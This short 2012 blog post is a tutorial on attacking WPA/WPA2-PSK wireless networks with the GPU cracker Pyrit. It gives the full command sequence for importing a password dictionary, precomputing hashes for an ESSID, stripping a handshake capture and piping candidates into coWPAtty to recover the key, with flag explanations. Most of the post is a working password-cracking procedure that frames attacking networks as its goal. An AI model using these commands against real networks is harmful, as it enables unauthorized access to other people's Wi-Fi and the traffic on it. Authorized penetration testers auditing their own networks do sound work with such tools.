Friday 1 June 2012

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit

In this article we will see how we can attack Wireless Networks using Pyrit tool. Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff.
Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock
How to:
Listing available cores
pyrit list_cores
List Available Cores
Determining performance of cores
pyrit benchmark
Determine Performance of Cores
Create a new ESSID
pyrit -e Linksys create_essid
Import list of passwords
pyrit -i dict.txt import_passwords
Creating ESSID and Importing Passwords
Start Batch Processing
pyrit batch
Batch Processing

pyrit -r wpa2.cap -o wpa2strip.cap stripLive

Cracking WPA/WPA2-PSK using pyrit/coWPAtty
pyrit -e “Linksys” -i dict.txt passthrough | cowpatty -d – -r wpa2strip.cap -s “Linksys“
“-e” ESSID for the command
“-i” Filename for the command (‘-’ is stdin/stdout) # -f switch deprecated
“-d” Hash file
“-” Accept words on stdin
“-r” Packet capture file
“-s” Network SSID
Cracking WPA/WPA2-PSK using coWPAtty

No comments:

Post a Comment